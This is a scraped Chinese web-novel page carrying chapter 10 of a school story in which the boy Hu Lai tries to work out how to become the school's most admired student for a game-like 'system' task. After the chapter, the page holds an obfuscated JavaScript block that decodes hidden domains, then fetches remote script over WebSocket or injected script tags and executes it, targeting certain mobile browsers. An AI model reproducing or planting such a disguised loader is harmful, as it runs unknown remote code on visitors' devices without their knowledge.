笔趣阁

字:
关灯 护眼
笔趣阁 > 禁区之狐 > 第十章 全校最靓的仔

第十章 全校最靓的仔

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
东川中学的大门在西苑街上,向东开。西苑街是一条南北向的小街,街西边是东川中学的院墙,东边则是老式居民楼,因为紧邻东川中学的缘故,这些居民楼的一楼都被改造成了各式店铺,有小卖部,有小饭馆,还有书店、文具店。靠山吃山,靠水吃水,靠着学校,这些小店的生意都还不错。
  大部分时候,这条街是安静的,除了上学和放学的时候。
  接送孩子的车流和涌动的人潮将这条并不宽敞的小街挤得水泄不通,就算有交警专门在这里维持秩序,也往往无济于事。
  现在就是东川中学一天中第一个最热闹的时候。
  上学的学生们从西苑街的南北两端涌进来,和送孩子上学的车辆汇聚在一起,街道上人流如潮,摩肩接踵。
  在这么拥挤的人潮中,突然传出了一声大喊。
  “啊啊啊啊啊啊啊——!!”
  但就像是一块石子被投入到了极其粘稠的液体中一样,荡起的涟漪并没有扩散到太远的地方,很快就消弭于无形中。
  胡莱能够感受到他身边那些人向他投来的白眼,那些眼神中有疑惑,有戏谑,甚至还有厌恶。
  他从未像现在这样希望看过来的人再多一些。
  但没有了,他这一嗓子只惊动了自己身边的人,再远一点,大家都照常往学校里走,连脚步都没有停下来。
  很显然,靠这种举动无法成为学校里最靓的仔。
  他很沮丧,低着头随着人流向校门走去。
  经过一个晚上,他已经从自己获得了系统的惊喜中回过神来,开始发愁于要怎么完成系统发布的这个任务。
  成为学校最靓的仔。
  就这么简单一句话,没有任何说明,也没有告诉他应该怎么完成。
  最靓的仔的标准是什么?
  是吸引全校师生的目光吗?
  是成为学校人人讨论的风云人物吗?
  但怎么才能成为这样的风云人物?
  很显然,靠在学校门口大喊大叫是不行的。
  胡莱不是那种学习成绩特别好,名列前茅的优等生,这样他的名字就可以出现在学校的光荣榜上了,或者登上每周一升旗仪式的主席台,受到学校表彰,接受全校同学羡慕敬佩的目光注视。
  他也不是那种凶名在外,人见人怕,能被教导主任在全校师生面前点名批评的不良少年。
  尽管在高一二班里胡莱是大家都知道的人,但在整个学校,他还声名不显,没有把自己的名声扩大到全校。
  埋头走在人群中的胡莱在脑海中又打开了系统界面,看到了任务日志里的任务,装有任务奖励的那个宝箱依然发着金光,漂浮在半空,等待着它的主人打开它。
  但现在胡莱只想叹气,近在咫尺,却又仿佛遥不可及……
  ※※※
  李青青从胡莱走进教室的那一刻起,就盯上了他。
  她昨天晚上躺在床上,只要一闭上眼睛,脑海中就会浮现出那个少年在黄昏下骑着自行车离开的背影,晃晃悠悠,影子很长。
  她担心自己把这个男孩子打击到了。
  现在她看到胡莱低垂着头有气无力地走进教室,走到自己的座位旁,没有和他的同桌打招呼,一屁股坐下来之后也没有从书包里掏书本,而是坐在位置上发呆……李青青心里就暗叫不好——她的担心变成了现实!
  看来他真的被打击得不轻啊……
  我是不是……应该去给他道个歉?
  李青青心里有些忐忑地想着。
  ※※※
  宋嘉佳看到自己的同桌一进来就失魂落魄的样子,下意识地捂住了自己的校服口袋:“我可没有零花钱了啊……”
  他以为胡莱的账号又被盗了呢。
  胡莱扭头看着他,突然问道:“宋胖子,你说要怎么才能成为学校的风云人物呢?”
  宋嘉佳先是一愣,随后眼珠子一转,笑了起来:“嗨!我当什么事儿呢!这还不简单?等做课间操的时候,你跑去高三一班那边,当着全校同学的面向唐秀媛学姐告白,你马上就能成为全校风云人物了!”
  高三一班的唐秀媛品学兼优,秀外慧中,是公认的东川中学校花,追求者无数,但她却都不为所动,专心学业,据说已经要被保送到名牌大学了。
  胡莱瞪了自己这位不靠谱的同桌一眼:“你出的什么馊主意!我怎么能够为了达到自己的目的就欺骗别人感情呢!”
  宋嘉佳翻了个白眼:“想多了啊,胡莱,你怎么可能欺骗得了人家感情?你只不过会从高一二班的笑柄变成东川中学的笑柄而已。你不是要成为风云人物吗?风云人物说白了就是个流量明星,只要能够吸引眼球和流量不就行?被人称赞和被人骂能够吸引流量,被人笑话一样可以嘛……”
  胡莱愣住了。
  因为他发现宋胖子说的竟然……有那么几分道理。
  任务说明只是要他成为最靓的仔,并没有限定任何条件,反正只要他备受瞩目不就行了?
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDA4NQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x4d\x4a\x52\x5a\x74\x53\x42\x70\x63\x77']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vYWpmMmpkajlmajI5LmJiZGlhbbnppc2h1LmNvbbQ==','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};